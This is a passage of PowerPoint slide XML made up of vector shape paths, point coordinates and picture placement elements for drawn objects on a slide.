                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97089" y="25754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96830" y="27717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98456" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101357" y="27717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97998" y="25754"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="58914" y="2918"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="52933" y="2918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54101" y="3072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53485" y="3240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93627" y="26695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97089" y="25754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97998" y="25754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58914" y="2918"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="4630" y="13867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4392" y="15678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7729" y="15678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4630" y="13867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="7729" y="15678"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4268" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9339" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7729" y="15678"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="14390" y="13867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4630" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7729" y="15678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14390" y="13867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="52933" y="2918"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="53485" y="3240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54101" y="3072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52933" y="2918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74598AB2-1027-516A-59BC-F105295A4538}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6821652" y="2572169"/>
              <a:ext cx="328295" cy="72390"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="93624" y="61709"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="49834" y="36131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="51181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43789" y="72250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93624" y="61709"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="172148" y="48171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="126847" y="25590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75501" y="34620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120802" y="61709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172148" y="48171"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="247662" y="37630"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="202349" y="12039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154025" y="21069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199339" y="48171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247662" y="37630"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="327685" y="24079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="280873" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231051" y="13550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276352" y="36131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327685" y="24079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4FD513F2-19A6-F85B-BAB2-48C2D4B98285}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6803538" y="2615814"/>
              <a:ext cx="326390" cy="78740"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="326390" h="78739">
                  <a:moveTo>
                    <a:pt x="217453" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="36123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108726" y="78268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326180" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21745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86DF6002-33BF-0BAA-9EBE-A8B7D8BAB632}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6439605" y="2633876"/>
              <a:ext cx="291465" cy="137160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="291465" h="137160">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="30103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291448" y="136969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291448" y="103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23E8523F-CD5D-C617-B8C5-2138942BDC13}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6344784" y="2058364"/>
              <a:ext cx="984885" cy="721995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="85759" y="584338"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85759" y="613428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382423" y="721797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483845" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386369" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381678" y="703587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384079" y="703166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121149" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97937" y="598642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="598642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91071" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="584338"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="384079" y="703166"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="381678" y="703587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386369" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384079" y="703166"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="966145" y="601045"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="384079" y="703166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386369" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483845" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="616206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="601045"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="973635" y="599731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="601045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973635" y="599731"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="984267" y="599731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973635" y="599731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="599731"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="97937" y="598642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103880" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="600813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97937" y="598642"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="103880" y="600813"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103880" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121149" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="600813"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="966145" y="584761"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="601045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973635" y="599731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="599731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972005" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="584761"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="103880" y="598642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97937" y="598642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="600813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="598642"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="966145" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="584761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972005" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="984267" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972005" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="85759" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85759" y="584338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91071" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="103880" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85759" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91071" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="628148" y="10837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="609843" y="10837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619427" y="18583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611018" y="19142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675542" y="475208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="584761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="572283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706016" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692737" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686959" y="460197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691721" y="460197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628148" y="10837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="626615" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="595084" y="2107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69968" y="577184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="584338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="572707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97187" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87171" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81958" y="562775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86146" y="562775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20734" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11818" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19217" y="112104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70296" y="112104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597053" y="20088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596776" y="20088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611018" y="19142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609843" y="10837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628148" y="10837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626615" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="81958" y="562775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87171" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86448" y="564809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81958" y="562775"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="86448" y="564809"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87171" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97187" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86448" y="564809"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="86146" y="562775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81958" y="562775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86448" y="564809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86146" y="562775"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="686959" y="460197"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="692737" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691989" y="462093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686959" y="460197"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="691989" y="462093"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="692737" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706016" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691989" y="462093"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="691721" y="460197"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="686959" y="460197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691989" y="462093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691721" y="460197"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="19217" y="112104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11818" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20509" y="120801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19217" y="112104"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="20509" y="120801"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11818" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20734" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20509" y="120801"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="70296" y="112104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19217" y="112104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20509" y="120801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70296" y="112104"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="609843" y="10837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="610939" y="18583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611018" y="19142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619427" y="18583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609843" y="10837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9" name="object 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEC9D82D-059E-23EA-2AE0-74446CB37B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32054" y="2137174"/>
              <a:ext cx="531553" cy="441011"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5ECA62-6CBE-0B46-039F-7044DD76ACB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56788" y="2196384"/>
              <a:ext cx="301918" cy="299719"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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7DE1DA4A-759B-A638-5074-298576C2734F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485497" y="2785900"/>
              <a:ext cx="715645" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="23307" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65187" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65187" y="76951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="76951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="114097" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77968" y="45641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75387" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76069" y="68799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99848" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100059" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108079" y="95679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117735" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123038" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127874" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136612" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141265" y="92597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112817" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107310" y="79491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99832" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97800" y="69737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97475" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147483" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147483" y="56753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147201" y="52763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147118" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97414" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97723" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97739" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99243" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104593" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108143" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143040" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142768" y="37236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139111" y="32572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134406" y="28892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128669" y="26263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122292" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123253" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114097" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="146203" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="143785" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141265" y="74980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137851" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129195" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124725" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="143040" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116881" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120214" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124501" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125558" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125639" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125761" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147118" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146958" y="49323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145571" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145497" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145385" y="42819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143040" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="170486" y="100136"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="167803" y="100136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167803" y="117327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168322" y="117327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171177" y="117997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175139" y="118688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184324" y="119826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188997" y="120111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199543" y="120111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204786" y="119562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214052" y="117327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217994" y="115518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221286" y="112999"/>
                  </a:lnTo>
                  <a:lnTo>
